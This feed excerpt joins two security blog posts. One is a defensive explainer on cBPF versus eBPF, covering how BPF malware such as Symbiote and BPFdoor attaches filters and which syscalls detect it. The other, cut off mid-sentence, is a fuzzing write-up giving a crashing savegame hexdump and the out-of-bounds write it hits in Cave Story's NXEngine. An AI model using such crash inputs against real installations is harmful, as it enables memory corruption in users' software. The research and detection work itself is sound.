<p>But why does this fail? When the cBPF instruction gets interpreted as an eBPF
instruction, the <code class="language-plaintext highlighter-rouge">0x06</code> half of the cBPF <code class="language-plaintext highlighter-rouge">code</code> short ends up in the eBPF <code class="language-plaintext highlighter-rouge">code</code>
byte. In eBPF this value maps to
<a href="https://elixir.bootlin.com/linux/v6.2.9/source/include/uapi/linux/bpf.h#L17"><code class="language-plaintext highlighter-rouge">BPF_JMP32</code></a>.
In eBPF this is called an <em>instruction class</em> and should be paired with an
<em>operation</em> to do something useful. For example, the eBPF equivalent of
<code class="language-plaintext highlighter-rouge">BPF_RET</code> is
<a href="https://elixir.bootlin.com/linux/v6.2.9/source/include/linux/filter.h#L387"><code class="language-plaintext highlighter-rouge">BPF_EXIT_INSN</code></a>
which is the OR of <code class="language-plaintext highlighter-rouge">BPF_JMP</code> (class) and <code class="language-plaintext highlighter-rouge">BPF_EXIT</code> (operation). When we pass
this filter straight into the <code class="language-plaintext highlighter-rouge">bpf</code> syscall we end up in the
<a href="https://elixir.bootlin.com/linux/v6.2.9/source/kernel/bpf/verifier.c#L2402"><code class="language-plaintext highlighter-rouge">check_subprogs</code></a>
function, which checks our code and falls through to the subprogram length
check. Because we fell through, the verifier knows we must have some kind of jump
instruction. Because our program is only one instruction long, the jump is
necessarily out of range, and the verification fails.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">off</span> <span class="o">=</span> <span class="n">i</span> <span class="o">+</span> <span class="n">insn</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">off</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span> <span class="c1">// off = 1 for the cBPF program, subprog_end = 1</span>
<span class="k">if</span> <span class="p">(</span><span class="n">off</span> <span class="o"><</span> <span class="n">subprog_start</span> <span class="o">||</span> <span class="n">off</span> <span class="o">>=</span> <span class="n">subprog_end</span><span class="p">)</span> <span class="p">{</span>
<span class="n">verbose</span><span class="p">(</span><span class="n">env</span><span class="p">,</span> <span class="s">"jump out of range from insn %d to %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">i</span><span class="p">,</span> <span class="n">off</span><span class="p">);</span>
<span class="k">return</span> <span class="o">-</span><span class="n">EINVAL</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
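<p>To make the reinterpretation concrete, here is a minimal sketch that copies the bytes of a cBPF <code class="language-plaintext highlighter-rouge">BPF_RET</code> instruction into an eBPF <code class="language-plaintext highlighter-rouge">struct bpf_insn</code> and recomputes the jump target from the check above. The helper names <code class="language-plaintext highlighter-rouge">reinterpret_cbpf</code> and <code class="language-plaintext highlighter-rouge">jump_target</code> are made up for illustration, and the result assumes a little-endian host.</p>

```c
#include <string.h>
#include <linux/bpf.h>     /* struct bpf_insn, BPF_JMP32 */
#include <linux/filter.h>  /* struct sock_filter, BPF_STMT, BPF_RET, BPF_K */

/* Reinterpret the 8 bytes of a cBPF instruction as an eBPF instruction.
 * This mirrors what effectively happens when cBPF bytecode is handed to
 * BPF_PROG_LOAD. Hypothetical helper, for illustration only. */
struct bpf_insn reinterpret_cbpf(struct sock_filter cbpf)
{
    struct bpf_insn ebpf;
    _Static_assert(sizeof(struct sock_filter) == sizeof(struct bpf_insn),
                   "both encodings are 8 bytes wide");
    memcpy(&ebpf, &cbpf, sizeof(ebpf));
    return ebpf;
}

/* Jump target computed the same way as in the kernel snippet above,
 * for the instruction at index i. */
int jump_target(int i, struct bpf_insn insn)
{
    return i + insn.off + 1;
}
```

<p>For <code class="language-plaintext highlighter-rouge">BPF_STMT(BPF_RET | BPF_K, 0)</code> the reinterpreted <code class="language-plaintext highlighter-rouge">code</code> byte has class <code class="language-plaintext highlighter-rouge">BPF_JMP32</code> and <code class="language-plaintext highlighter-rouge">off</code> is zero, so the target for instruction 0 is 1, which is not below a <code class="language-plaintext highlighter-rouge">subprog_end</code> of 1.</p>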
<p>Of course you might be able to handcraft a valid cBPF-eBPF polyglot, but the
point remains that the two are neither designed nor intended to be mutually
compatible. The correct way to load a cBPF filter into eBPF is to simply load
the filter as usual, with <code class="language-plaintext highlighter-rouge">SO_ATTACH_FILTER</code> set while calling <code class="language-plaintext highlighter-rouge">setsockopt</code>. In
a modern kernel this will get verified by <code class="language-plaintext highlighter-rouge">bpf_check_classic</code> and, assuming it
passes, translated into eBPF bytecode by <code class="language-plaintext highlighter-rouge">bpf_convert_filter</code> before being
attached and run.</p>
<p>When thinking about the difference between cBPF and eBPF, it’s better to think
of it as more of a Python 2 to Python 3 style conversion and not as a C to C++
style conversion<sup id="fnref:pedantic" role="doc-noteref"><a href="#fn:pedantic" class="footnote" rel="footnote">11</a></sup>. eBPF is its own new thing, not a superset of cBPF.</p>
<h1 id="bpf-as-malware">BPF as Malware</h1>
<p>Let’s get back to malware. How is BPF actually being used in malware today? As
it turns out, it’s mostly cBPF filters. It makes a lot of sense that malware
authors would avoid eBPF. The capabilities are evolving rapidly, changes to the
verifier and differences in patch sets mean you can’t be sure your filters will
always work, and the lack of widespread BTF adoption until recently makes
running filters across different kernels tricky. If you want to target the
broadest base of Linux systems, you have to stick to cBPF.</p>
<p>Let’s take a look at a list of malware that leverages BPF, borrowed from
a Hushcon talk <sup id="fnref:7" role="doc-noteref"><a href="#fn:7" class="footnote" rel="footnote">12</a></sup>.</p>
<ul>
<li>cd00r (or cDoor): uses libpcap to build a cBPF filter</li>
<li>Turla’s Penquin: similar to cd00r, uses a cBPF filter for persistence</li>
<li>CIA’s HIVE: uses a cBPF socket filter similar to cd00r</li>
<li>NSA’s dewdrop: again, uses a flexible cBPF socket filter</li>
</ul>
<p>What’s the common theme here? Some kind of backdoor persistence, activated with
a cBPF filter. What about something more modern?</p>
<p>Let’s look at Symbiote first, from one of the samples that actually leverages
BPF.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="mo">0000</span><span class="n">d62c</span> <span class="n">memcpy</span><span class="p">(</span><span class="n">rax_10</span><span class="p">,</span> <span class="o">&</span><span class="n">filter</span><span class="p">,</span> <span class="mh">0x1d0</span><span class="p">)</span>
<span class="mo">0000</span><span class="n">d65c</span> <span class="n">memcpy</span><span class="p">(</span><span class="n">rax_10</span> <span class="o">+</span> <span class="mh">0x1d0</span><span class="p">,</span> <span class="o">*</span><span class="p">(</span><span class="n">arg4</span> <span class="o">+</span> <span class="mi">8</span><span class="p">),</span> <span class="n">zx</span><span class="p">.</span><span class="n">q</span><span class="p">(</span><span class="o">*</span><span class="n">arg4</span><span class="p">)</span> <span class="o"><<</span> <span class="mi">3</span><span class="p">)</span>
<span class="mo">0000</span><span class="n">d664</span> <span class="kt">int16_t</span> <span class="n">var_38</span> <span class="o">=</span> <span class="n">var_58</span><span class="p">.</span><span class="n">w</span>
<span class="mo">0000</span><span class="n">d66c</span> <span class="kt">uint64_t</span> <span class="n">var_30</span> <span class="o">=</span> <span class="n">rax_10</span>
<span class="mo">0000</span><span class="n">d69f</span> <span class="k">return</span> <span class="n">syscall</span><span class="p">(</span><span class="mh">0x36</span><span class="p">,</span> <span class="n">zx</span><span class="p">.</span><span class="n">q</span><span class="p">(</span><span class="n">arg1</span><span class="p">),</span> <span class="n">zx</span><span class="p">.</span><span class="n">q</span><span class="p">(</span><span class="n">arg2</span><span class="p">),</span> <span class="n">zx</span><span class="p">.</span><span class="n">q</span><span class="p">(</span><span class="n">arg3</span><span class="p">),</span> <span class="o">&</span><span class="n">var_38</span><span class="p">,</span> <span class="n">zx</span><span class="p">.</span><span class="n">q</span><span class="p">(</span><span class="n">arg5</span><span class="p">))</span>
</code></pre></div></div>
<p>That syscall number, <code class="language-plaintext highlighter-rouge">0x36</code>, is <code class="language-plaintext highlighter-rouge">setsockopt</code>. This is a cBPF filter.</p>
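<p>Reading the decompilation, the two <code class="language-plaintext highlighter-rouge">memcpy</code> calls appear to build a new filter: 0x1d0 bytes of the sample's own program (58 instructions, since a <code class="language-plaintext highlighter-rouge">struct sock_filter</code> is 8 bytes) followed by the caller's program (<code class="language-plaintext highlighter-rouge">len &lt;&lt; 3</code> bytes). That is my interpretation rather than something the listing states outright. A minimal sketch of that concatenation, with the hypothetical name <code class="language-plaintext highlighter-rouge">concat_filters</code>:</p>

```c
#include <stdlib.h>
#include <string.h>
#include <linux/filter.h>  /* struct sock_filter, struct sock_fprog, BPF_MAXINSNS */

/* Build a new sock_fprog holding `prefix` followed by the instructions in
 * `orig`. Returns 0 on success, -1 if the result would be empty, too long,
 * or if allocation fails. The caller frees out->filter. */
int concat_filters(const struct sock_filter *prefix, unsigned short n_prefix,
                   const struct sock_fprog *orig, struct sock_fprog *out)
{
    size_t total = (size_t)n_prefix + orig->len;
    if (total == 0 || total > BPF_MAXINSNS)
        return -1;

    struct sock_filter *buf = malloc(total * sizeof(*buf));
    if (buf == NULL)
        return -1;

    /* Each instruction is 8 bytes, which is where the `<< 3` comes from. */
    memcpy(buf, prefix, n_prefix * sizeof(*buf));
    memcpy(buf + n_prefix, orig->filter, orig->len * sizeof(*buf));

    out->len = (unsigned short)total;
    out->filter = buf;
    return 0;
}
```

<p>The resulting <code class="language-plaintext highlighter-rouge">len</code> and <code class="language-plaintext highlighter-rouge">filter</code> pair is what a <code class="language-plaintext highlighter-rouge">struct sock_fprog</code> looks like, which would line up with the 16-bit and 64-bit locals set just before the syscall.</p>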
<p>Alright, what about BPFdoor? The source code for that allegedly got leaked, and
we can see that it indeed uses cBPF<sup id="fnref:16" role="doc-noteref"><a href="#fn:16" class="footnote" rel="footnote">13</a></sup>. This source matches what can be seen
from captured samples, so it should be pretty safe to say eBPF is not used here.</p>
<p>But certainly someone is using eBPF maliciously, right? Probably! But if it
exists, we aren’t looking in the right places for it. There are a number of
academic projects demonstrating the capabilities of eBPF for malware, and they
are impressive. TripleCross <sup id="fnref:10" role="doc-noteref"><a href="#fn:10" class="footnote" rel="footnote">14</a></sup> is a comprehensive rootkit built on eBPF, as
are ebpfkit <sup id="fnref:11" role="doc-noteref"><a href="#fn:11" class="footnote" rel="footnote">15</a></sup> and boopkit <sup id="fnref:12" role="doc-noteref"><a href="#fn:12" class="footnote" rel="footnote">16</a></sup>. But again, either eBPF is being avoided by
malware authors in the wild, or we simply aren’t looking hard enough.</p>
<h1 id="filtering-the-filter">Filtering the Filter</h1>
<p>Okay, great, so we know that eBPF and cBPF are different and that malware tends
to prefer cBPF. How do we actually defend against it? Even without in-the-wild
samples, the capabilities of eBPF malware have been clearly demonstrated, and we
probably want to protect ourselves from both.</p>
<h2 id="classical-detections">Classical Detections</h2>
<p>There are a few ways to attach cBPF filters. We can see them by checking for
places in the kernel where <code class="language-plaintext highlighter-rouge">struct sock_fprog</code> is used<sup id="fnref:17" role="doc-noteref"><a href="#fn:17" class="footnote" rel="footnote">17</a></sup>. We find five
methods, one of which is most common.</p>
<p>The first, which is what malware mostly uses, is to call <code class="language-plaintext highlighter-rouge">setsockopt</code> with the
<code class="language-plaintext highlighter-rouge">SO_ATTACH_FILTER</code> option. This does exactly what it sounds like: you tell the
kernel you want to attach a filter to a socket. Similarly, you can call
<code class="language-plaintext highlighter-rouge">setsockopt</code> on a <code class="language-plaintext highlighter-rouge">packet</code> socket with <code class="language-plaintext highlighter-rouge">PACKET_FANOUT_DATA</code> to attach a filter
to a fanout socket. The type determines what kind of BPF filter gets attached,
either <code class="language-plaintext highlighter-rouge">PACKET_FANOUT_CBPF</code> for cBPF or <code class="language-plaintext highlighter-rouge">PACKET_FANOUT_EBPF</code> for eBPF. Note that
this does not bypass the <code class="language-plaintext highlighter-rouge">bpf()</code> syscall for eBPF, as you may not pass in an
eBPF program directly. Instead, you must pass in an eBPF program file descriptor
returned by the <code class="language-plaintext highlighter-rouge">bpf()</code> syscall. For cBPF, on the other hand, you may pass in
the filter program directly.</p>
<p>The third way is to call <code class="language-plaintext highlighter-rouge">prctl</code> with the <code class="language-plaintext highlighter-rouge">PR_SET_SECCOMP</code> option and the second
argument set to <code class="language-plaintext highlighter-rouge">SECCOMP_MODE_FILTER</code>. Like <code class="language-plaintext highlighter-rouge">setsockopt</code>, this will take an
array of <code class="language-plaintext highlighter-rouge">sock_filter</code> structs (i.e., a cBPF program). The fourth and fifth ways
are both <code class="language-plaintext highlighter-rouge">ioctl</code> calls on <code class="language-plaintext highlighter-rouge">tun</code> and <code class="language-plaintext highlighter-rouge">ppp</code> devices. The <code class="language-plaintext highlighter-rouge">TUNATTACHFILTER</code> <code class="language-plaintext highlighter-rouge">ioctl</code>
attaches a cBPF filter to a <code class="language-plaintext highlighter-rouge">tun</code> device. The <code class="language-plaintext highlighter-rouge">PPPIOCSPASS</code>, <code class="language-plaintext highlighter-rouge">PPPIOCSACTIVE</code>,
<code class="language-plaintext highlighter-rouge">PPPIOCSPASS32</code>, and <code class="language-plaintext highlighter-rouge">PPPIOCSACTIVE32</code> <code class="language-plaintext highlighter-rouge">ioctl</code>s all attach cBPF filters to <code class="language-plaintext highlighter-rouge">ppp</code>
devices.</p>
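<p>The seccomp path is easy to try out. The sketch below installs a seccomp filter that allows every syscall, so it changes nothing about the process but still hands a cBPF program to the kernel through <code class="language-plaintext highlighter-rouge">prctl</code>. The function name <code class="language-plaintext highlighter-rouge">install_allow_all_seccomp</code> is hypothetical.</p>

```c
#include <sys/prctl.h>      /* prctl, PR_SET_SECCOMP, PR_SET_NO_NEW_PRIVS */
#include <linux/filter.h>   /* struct sock_filter, struct sock_fprog, BPF_STMT */
#include <linux/seccomp.h>  /* SECCOMP_MODE_FILTER, SECCOMP_RET_ALLOW */

/* Install a seccomp filter that allows every syscall. It is harmless, but
 * it travels the same cBPF attach path a restrictive filter would.
 * Returns 0 on success, -1 with errno set on failure. */
int install_allow_all_seccomp(void)
{
    struct sock_filter code[] = {
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
    };
    struct sock_fprog prog = {
        .len = sizeof(code) / sizeof(code[0]),
        .filter = code,
    };

    /* Unprivileged processes must set no_new_privs before adding a filter. */
    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) != 0)
        return -1;
    return prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog);
}
```

<p>Note that the program is still a plain array of <code class="language-plaintext highlighter-rouge">sock_filter</code> structs wrapped in a <code class="language-plaintext highlighter-rouge">sock_fprog</code>, the same shape used for socket filters.</p>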
<p>By monitoring these three calls for these five patterns, we can observe whenever
a cBPF program is loaded. We can also simplify pattern matching on <code class="language-plaintext highlighter-rouge">setsockopt</code>,
<code class="language-plaintext highlighter-rouge">prctl</code>, and <code class="language-plaintext highlighter-rouge">ioctl</code> syscalls by observing the <code class="language-plaintext highlighter-rouge">bpf_prog_create_from_user</code>
kernel function, <code class="language-plaintext highlighter-rouge">sk_attach_filter</code> kernel function, and <code class="language-plaintext highlighter-rouge">get_filter</code> kernel
function. The <code class="language-plaintext highlighter-rouge">bpf_prog_create_from_user</code> function is used by the packet fanout
filter and SECCOMP filters. The <code class="language-plaintext highlighter-rouge">sk_attach_filter</code> function is used by the
standard socket filter and <code class="language-plaintext highlighter-rouge">tun</code> driver. And finally, <code class="language-plaintext highlighter-rouge">get_filter</code> is used by
the <code class="language-plaintext highlighter-rouge">ppp</code> driver.</p>
<p>Note that it is possible to attach a socket filter using the <code class="language-plaintext highlighter-rouge">bpf</code> syscall, with
<code class="language-plaintext highlighter-rouge">BPF_PROG_TYPE_SOCKET_FILTER</code>. However, the supplied bytecode here must be eBPF
bytecode (remember, eBPF is not a superset of cBPF) so this is really just a
special case of loading an eBPF program.</p>
<h2 id="extended-detections">Extended Detections</h2>
<p>Detecting eBPF is significantly easier. No matter what else you want to do with
it, you’ll need to load your program with the <code class="language-plaintext highlighter-rouge">bpf</code> syscall. After that, there’s
a ton of stuff that can be done to attach the filter to so, so many different
things. But that <code class="language-plaintext highlighter-rouge">bpf</code> call must always be there. If we want to detect eBPF,
we only have to monitor this one point in the kernel.</p>
<h1 id="can-you-summarize-that-for-me">Can you summarize that for me?</h1>
<p>Sure. BPF is an umbrella term for both cBPF and eBPF, which are very different.
If you’re concerned about BPF in malware you most likely want to be watching
<code class="language-plaintext highlighter-rouge">sk_attach_filter</code>, which is cBPF. If you’re concerned about eBPF in malware you
only need to worry about the <code class="language-plaintext highlighter-rouge">bpf</code> syscall.</p>
<h1 id="references">References</h1>
<div class="footnotes" role="doc-endnotes">
<ol>
<li id="fn:1" role="doc-endnote">
<p><a href="https://blogs.blackberry.com/en/2022/06/symbiote-a-new-nearly-impossible-to-detect-linux-threat">https://blogs.blackberry.com/en/2022/06/symbiote-a-new-nearly-impossible-to-detect-linux-threat</a> <a href="#fnref:1" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:2" role="doc-endnote">
<p><a href="https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor">https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor</a> <a href="#fnref:2" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:3" role="doc-endnote">
<p><a href="https://sysdig.com/blog/bpfdoor-falco-detection/">https://sysdig.com/blog/bpfdoor-falco-detection/</a> <a href="#fnref:3" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:4" role="doc-endnote">
<p><a href="https://news.ycombinator.com/item?id=33489935">https://news.ycombinator.com/item?id=33489935</a> <a href="#fnref:4" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:5" role="doc-endnote">
<p><a href="https://www.kernel.org/doc/html/v6.0/bpf/bpf_licensing.html#background">https://www.kernel.org/doc/html/v6.0/bpf/bpf_licensing.html#background</a> <a href="#fnref:5" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:8" role="doc-endnote">
<p>Steven McCanne and Van Jacobson. 1993. The BSD packet filter: a new architecture for user-level packet capture. In Proceedings of the USENIX Winter 1993 Conference (USENIX’93). USENIX Association, Berkeley, CA, USA, 2-2. <a href="http://www.tcpdump.org/papers/bpf-usenix93.pdf">http://www.tcpdump.org/papers/bpf-usenix93.pdf</a> <a href="#fnref:8" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:14" role="doc-endnote">
<p><a href="https://lwn.net/Articles/475043/">https://lwn.net/Articles/475043/</a> <a href="#fnref:14" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:9" role="doc-endnote">
<p><a href="https://man7.org/linux/man-pages/man2/bpf.2.html">https://man7.org/linux/man-pages/man2/bpf.2.html</a> <a href="#fnref:9" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:6" role="doc-endnote">
<p><a href="https://www.kernel.org/doc/html/v6.0/bpf/classic_vs_extended.html">https://www.kernel.org/doc/html/v6.0/bpf/classic_vs_extended.html</a> <a href="#fnref:6" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:15" role="doc-endnote">
<p><a href="https://www.kernel.org/doc/html/v6.0/bpf/classic_vs_extended.html#opcode-encoding">https://www.kernel.org/doc/html/v6.0/bpf/classic_vs_extended.html#opcode-encoding</a> <a href="#fnref:15" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:pedantic" role="doc-endnote">
<p>I suppose C++ is not strictly a superset of C, due to differences in behaviors in the specs. But it’s close enough for this metaphor. <a href="#fnref:pedantic" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:7" role="doc-endnote">
<p>Evolution of Stealth Packet Filters, Hushcon Seattle 2022, Richard Johnson (@richinseattle) at Fuzzing IO / Trellix <a href="#fnref:7" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:16" role="doc-endnote">
<p><a href="https://github.com/snapattack/bpfdoor-scanner/blob/main/sample/bpfdoor.c#L462">https://github.com/snapattack/bpfdoor-scanner/blob/main/sample/bpfdoor.c#L462</a> <a href="#fnref:16" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:10" role="doc-endnote">
<p><a href="https://github.com/h3xduck/TripleCross">https://github.com/h3xduck/TripleCross</a> <a href="#fnref:10" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:11" role="doc-endnote">
<p><a href="https://github.com/Gui774ume/ebpfkit">https://github.com/Gui774ume/ebpfkit</a> <a href="#fnref:11" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:12" role="doc-endnote">
<p><a href="https://github.com/krisnova/boopkit">https://github.com/krisnova/boopkit</a> <a href="#fnref:12" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:17" role="doc-endnote">
<p><a href="https://elixir.bootlin.com/linux/latest/C/ident/sock_fprog">https://elixir.bootlin.com/linux/latest/C/ident/sock_fprog</a> <a href="#fnref:17" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
</ol>
</div>Friday OrtizTL;DR: Let’s detect malware that uses BPF the right way. eBPF has become a hot topic, which leads to some hype whenever BPF is found in malware. The thing is, BPF malware is nothing new and most malware is using cBPF, not eBPF. Conflating cBPF with eBPF is harmful to defenders, who really need to understand the difference between the two when writing detections.Never Stop Reading: Crashing the HaikuOS Port of Cave Story2022-07-17T05:00:00+00:002022-07-17T05:00:00+00:00https://ortiz.sh/identity/2022/07/17/BGGP3<p><strong>TL;DR:</strong> Cave Story for HaikuOS go SEGV.</p>
<h2 id="bggp3">BGGP3</h2>
<p>The Binary Golf Grand Prix is an annual competition (three years now, that
counts) where you Golf (do fun stuff to) Binary files. The first year had
people create tiny ambigram binaries. The second year involved polyglots. This
year’s Binary Golf Grand Prix (BGGP3) is all about finding tiny crashes. We
want to find the smallest possible input to a program that will crash it and,
ideally, let us take over control flow.<sup id="fnref:bggp3" role="doc-noteref"><a href="#fn:bggp3" class="footnote" rel="footnote">1</a></sup></p>
<p>At around the same time BGGP3 was announced, a friend of mine mentioned that
Cave Story had been ported to HaikuOS<sup id="fnref:csru" role="doc-noteref"><a href="#fn:csru" class="footnote" rel="footnote">2</a></sup>. I thought aloud, “wouldn’t it be
hilarious to find a tiny crash in the Cave Story port to HaikuOS?” And so it
was. I ended up finding a crash in both the HaikuOS version (the original
<code class="language-plaintext highlighter-rouge">NXEngine</code>), and the version that gets bundled into most Linux distributions
(<code class="language-plaintext highlighter-rouge">nxengine-evo</code>).</p>
<h2 id="fuzzing-cave-story">Fuzzing Cave Story</h2>
<p>The first step was to find an appropriate source and sink in Cave Story to
target with fuzzing. By playing the game a little bit and downloading a local
copy of the source code, I decided to use the <code class="language-plaintext highlighter-rouge">profile.dat</code> savegame files as an
input, with the target being the <code class="language-plaintext highlighter-rouge">profile_load</code> function which parses and loads
the profile files. To hit this function directly, I simply modified the start
of the <code class="language-plaintext highlighter-rouge">main</code> function in <code class="language-plaintext highlighter-rouge">main.cpp</code> to attempt to load any profile we pass in
on the command line.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include "profile.h"
#include "profile.fdh"
</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">argv</span><span class="p">[])</span>
<span class="p">{</span>
<span class="n">Profile</span> <span class="n">p</span><span class="p">;</span>
<span class="n">profile_load</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="o">&</span><span class="n">p</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
</code></pre></div></div>
<p>Next, I created <code class="language-plaintext highlighter-rouge">afi/</code> and <code class="language-plaintext highlighter-rouge">afo/</code> folders for AFL++ to store input and output
files, respectively. I copied some of the legitimate <code class="language-plaintext highlighter-rouge">profile.dat</code> files into
<code class="language-plaintext highlighter-rouge">afi/</code> and let it run with <code class="language-plaintext highlighter-rouge">afl-fuzz -t 5000 -n -i afi -o afo ./nx @@</code>. This
just happened to be the format of the <code class="language-plaintext highlighter-rouge">afl-fuzz</code> command most recently in my
history; I can’t even remember what all the options mean. I didn’t expect this
to work, but it found several crashes almost immediately.</p>
<h2 id="analyzing-the-crashes">Analyzing the Crash(es)</h2>
<p>There were two crashes found, a 60 byte crash (the “large” crash) and an 8 byte
crash (the “small” crash). I’ll be using the source code from the original
NXEngine to demonstrate, but the vulnerable <code class="language-plaintext highlighter-rouge">profile_load</code> function is the same
in both the <code class="language-plaintext highlighter-rouge">NXEngine</code> and <code class="language-plaintext highlighter-rouge">nxengine-evo</code> repositories.</p>
<h3 id="the-large-crash-60-bytes">The Large Crash (60 bytes)</h3>
<p><a href="/download/profile.dat_60byte">Download Here</a></p>
<p>Let’s start with the large crash, since it’s more robust. The beginning of the
file, the <code class="language-plaintext highlighter-rouge">Do041220</code> string, is a magic value that the loader uses to determine
if this is even a valid <code class="language-plaintext highlighter-rouge">profile.dat</code> save file. We can go ahead and ignore all
the intermediary bytes up until that last <code class="language-plaintext highlighter-rouge">0x5C</code>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>00000000: 446f 3034 3132 3230 0d00 0000 0800 0000 Do041220........
00000010: 2de6 0100 20e0 0000 0200 0000 0300 0000 -... ...........
00000020: 0300 0000 0000 0000 0000 0000 0000 0000 ................
00000030: 0000 0000 0000 0000 0000 005c ...........\
</code></pre></div></div>
<p>Let’s look at the original section of the code that loads the player’s weapons
from this file. As you can see, there’s a <code class="language-plaintext highlighter-rouge">u32</code> that gets read from the file
and stored in the <code class="language-plaintext highlighter-rouge">int type</code>. This ends up being our <code class="language-plaintext highlighter-rouge">0x5C</code> value, but as a
little endian <code class="language-plaintext highlighter-rouge">u32</code>, thus it gets read as <code class="language-plaintext highlighter-rouge">0x5C000000</code>. Further down, when we
try to access <code class="language-plaintext highlighter-rouge">file->weapons[type]</code> we end up trying to write to a memory
location way out of bounds, and we segfault.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// load weapons</span>
<span class="n">fseek</span><span class="p">(</span><span class="n">fp</span><span class="p">,</span> <span class="n">PF_WEAPONS_OFFS</span><span class="p">,</span> <span class="n">SEEK_SET</span><span class="p">);</span>
<span class="k">for</span><span class="p">(</span><span class="n">i</span><span class="o">=</span><span class="mi">0</span><span class="p">;</span><span class="n">i</span><span class="o"><</span><span class="n">MAX_WPN_SLOTS</span><span class="p">;</span><span class="n">i</span><span class="o">++</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">type</span> <span class="o">=</span> <span class="n">fgetl</span><span class="p">(</span><span class="n">fp</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">type</span><span class="p">)</span> <span class="k">break</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">level</span> <span class="o">=</span> <span class="n">fgetl</span><span class="p">(</span><span class="n">fp</span><span class="p">);</span>
<span class="kt">int</span> <span class="n">xp</span> <span class="o">=</span> <span class="n">fgetl</span><span class="p">(</span><span class="n">fp</span><span class="p">);</span>
<span class="kt">int</span> <span class="n">maxammo</span> <span class="o">=</span> <span class="n">fgetl</span><span class="p">(</span><span class="n">fp</span><span class="p">);</span>
<span class="kt">int</span> <span class="n">ammo</span> <span class="o">=</span> <span class="n">fgetl</span><span class="p">(</span><span class="n">fp</span><span class="p">);</span>
<span class="n">file</span><span class="o">-></span><span class="n">weapons</span><span class="p">[</span><span class="n">type</span><span class="p">].</span><span class="n">hasWeapon</span> <span class="o">=</span> <span class="nb">true</span><span class="p">;</span>
<span class="n">file</span><span class="o">-></span><span class="n">weapons</span><span class="p">[</span><span class="n">type</span><span class="p">].</span><span class="n">level</span> <span class="o">=</span> <span class="p">(</span><span class="n">level</span> <span class="o">-</span> <span class="mi">1</span><span class="p">);</span>
<span class="n">file</span><span class="o">-></span><span class="n">weapons</span><span class="p">[</span><span class="n">type</span><span class="p">].</span><span class="n">xp</span> <span class="o">=</span> <span class="n">xp</span><span class="p">;</span>
<span class="n">file</span><span class="o">-></span><span class="n">weapons</span><span class="p">[</span><span class="n">type</span><span class="p">].</span><span class="n">ammo</span> <span class="o">=</span> <span class="n">ammo</span><span class="p">;</span>
<span class="n">file</span><span class="o">-></span><span class="n">weapons</span><span class="p">[</span><span class="n">type</span><span class="p">].</span><span class="n">maxammo</span> <span class="o">=</span> <span class="n">maxammo</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">i</span> <span class="o">==</span> <span class="n">curweaponslot</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">file</span><span class="o">-></span><span class="n">curWeapon</span> <span class="o">=</span> <span class="n">type</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
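<p>To see where <code class="language-plaintext highlighter-rouge">0x5C000000</code> comes from, here is a small sketch that decodes the last four bytes of the crash file as a little-endian 32-bit value. The helper name <code class="language-plaintext highlighter-rouge">le32</code> is made up for this example and is not part of NXEngine.</p>

```c
#include <stdint.h>

/* Decode four bytes as a little-endian u32, independent of host byte
 * order: the first byte in the file is the least significant. */
uint32_t le32(const unsigned char b[4])
{
    return (uint32_t)b[0]
         | (uint32_t)b[1] << 8
         | (uint32_t)b[2] << 16
         | (uint32_t)b[3] << 24;
}
```

<p>Feeding it the bytes <code class="language-plaintext highlighter-rouge">00 00 00 5c</code> gives <code class="language-plaintext highlighter-rouge">0x5C000000</code>, or 1543503872 as a signed <code class="language-plaintext highlighter-rouge">int</code>, which is what ends up being used as the <code class="language-plaintext highlighter-rouge">weapons</code> index.</p>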
<h3 id="the-small-crash-8-bytes">The Small Crash (8 bytes)</h3>
<p><a href="/download/profile.dat_8byte">Download Here</a></p>
<p>This crash isn’t as reliable, but I think it’s more fun. I can only replicate
